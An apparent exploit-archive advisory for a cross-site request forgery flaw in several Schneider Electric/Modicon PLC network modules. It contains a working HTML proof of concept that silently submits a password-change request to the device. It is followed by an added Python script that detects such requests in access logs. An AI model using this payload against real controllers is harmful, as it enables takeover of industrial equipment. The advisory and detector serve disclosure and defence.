Schneider Electric/Modicon PLC - CSRF Vulnerability

2018.05.22
t4rkd3vilz (HK)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Schneider Electric/Modicon PLC - CSRF Vulnerability
# Date: 2018-05-18
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Version: BMXNOC0401, BMXNOE0100, BMXNOE0110, BMXNOE0110H, BMXNOR0200H, BMXP342020, BMXP342020H, BMXP342030, BMXP3420302, BMXP3420302H, and BMXP342030H.
# Tested on: Windows 8 OS and Chrome Explorer
# Greetz: Jameel Nabbo

# PoC

<html>
  <head>
    <title>CSRF POC</title>
  </head>
  <body>
    <form action="http://TargetAdress/secure/embedded/builtin?Language=undefined&user=USERNAME&passwd=PASSWORD&cnfpasswd=PASSWORD&subhttppwd=Change+Password" method="get">
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
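A defender-side check for the request this PoC generates, added here as an example and not part of the original advisory: it scans web access-log lines for the password-change GET and reports whether the Referer host belongs to the PLC, without copying the password values that travel in the query string. The Combined Log Format, the `plc.example` host name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter names come from the PoC; everything else here is assumed.
PATH = "/secure/embedded/builtin"
REQUIRED = {"user", "passwd", "cnfpasswd", "subhttppwd"}

# Assumed log layout: Combined Log Format from a proxy in front of the PLC.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)"'
)

# Constructed sample lines (documentation addresses and host names).
REQ = ('"GET ' + PATH + '?Language=undefined&user=USERNAME&passwd=PASSWORD'
       '&cnfpasswd=PASSWORD&subhttppwd=Change+Password HTTP/1.1" 200 512 ')
SAMPLE_LOG = [
    '192.0.2.10 - - [18/May/2018:10:01:02 +0000] ' + REQ + '"http://plc.example/" "Mozilla/5.0"',
    '192.0.2.11 - - [18/May/2018:10:05:40 +0000] ' + REQ + '"http://other.example/p.html" "Mozilla/5.0"',
    '192.0.2.12 - - [18/May/2018:10:09:13 +0000] ' + REQ + '"-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/May/2018:10:10:00 +0000] "GET /index.htm HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def classify(line, plc_hosts):
    """Return a finding for a password-change request, or None for any other line."""
    m = LINE.match(line)
    if not m or m["method"] != "GET":
        return None
    url = urlsplit(m["target"])
    params = parse_qs(url.query, keep_blank_values=True)
    if url.path != PATH or not REQUIRED.issubset(params):
        return None
    ref_host = urlsplit(m["referer"]).hostname  # None when the Referer is "-" or empty
    if ref_host is None:
        origin = "no-referer"  # cannot be confirmed as same-site
    elif ref_host in plc_hosts:
        origin = "same-site"
    else:
        origin = "cross-site"
    # Only the account name is kept; passwd/cnfpasswd values are never copied out.
    return {"client": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "user": params["user"][0], "origin": origin,
            "referer_host": ref_host, "suspicious": origin != "same-site"}

def findings(lines, plc_hosts):
    return [f for f in (classify(l, plc_hosts) for l in lines) if f]

if __name__ == "__main__":
    for f in findings(SAMPLE_LOG, {"plc.example"}):
        print(f)
```

Because the credentials are sent as GET parameters, the raw log lines themselves contain them and should be treated as sensitive.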

